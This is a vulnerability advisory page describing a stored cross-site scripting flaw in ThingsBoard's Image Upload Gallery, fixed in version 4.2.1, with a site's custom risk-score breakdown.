Primary

Context

ThingsBoard Stored Cross-Site Scripting Vulnerability in Image Upload Gallery

Vulnerability

Patched

A stored cross-site scripting vulnerability has been identified in ThingsBoard versions prior to 4.2.1. This issue resides in the dashboard's Image Upload Gallery feature, where an attacker can upload an SVG file embedded with malicious JavaScript. The injected script may execute when the image is displayed in the user interface. The vulnerability arises from inadequate sanitization and improper validation of the content type for uploaded SVG files.

Impact

Exploitation of this vulnerability allows for stored cross-site scripting, where uploaded SVG files can execute malicious JavaScript when rendered in the UI.

Remediation

Users can upgrade to ThingsBoard version 4.2.1 or later, where this vulnerability has been fixed.

Added: Oct 17, 2025, 7:22 PM

Updated: Oct 17, 2025, 7:22 PM

Vulnerability Rating

Custom Algorithm

spread

5.0

impact

1.7

exploitability

5.0

remediation

7.7

relevance

0.8

threat

0.0

urgency

2.9

incentive

1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.

Vulnerability Rating

Custom Algorithm

spread

5.0

impact

1.7

exploitability

5.0

remediation

7.7

relevance

0.8

threat

0.0

urgency

2.9

incentive

1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.

ThingsBoard Stored Cross-Site Scripting Vulnerability in Image Upload Gallery

Vulnerability

Impact

Remediation

Affected Products

ThingsBoard

CVSS Scores

References

Vulnerability Rating

Vulnerability Rating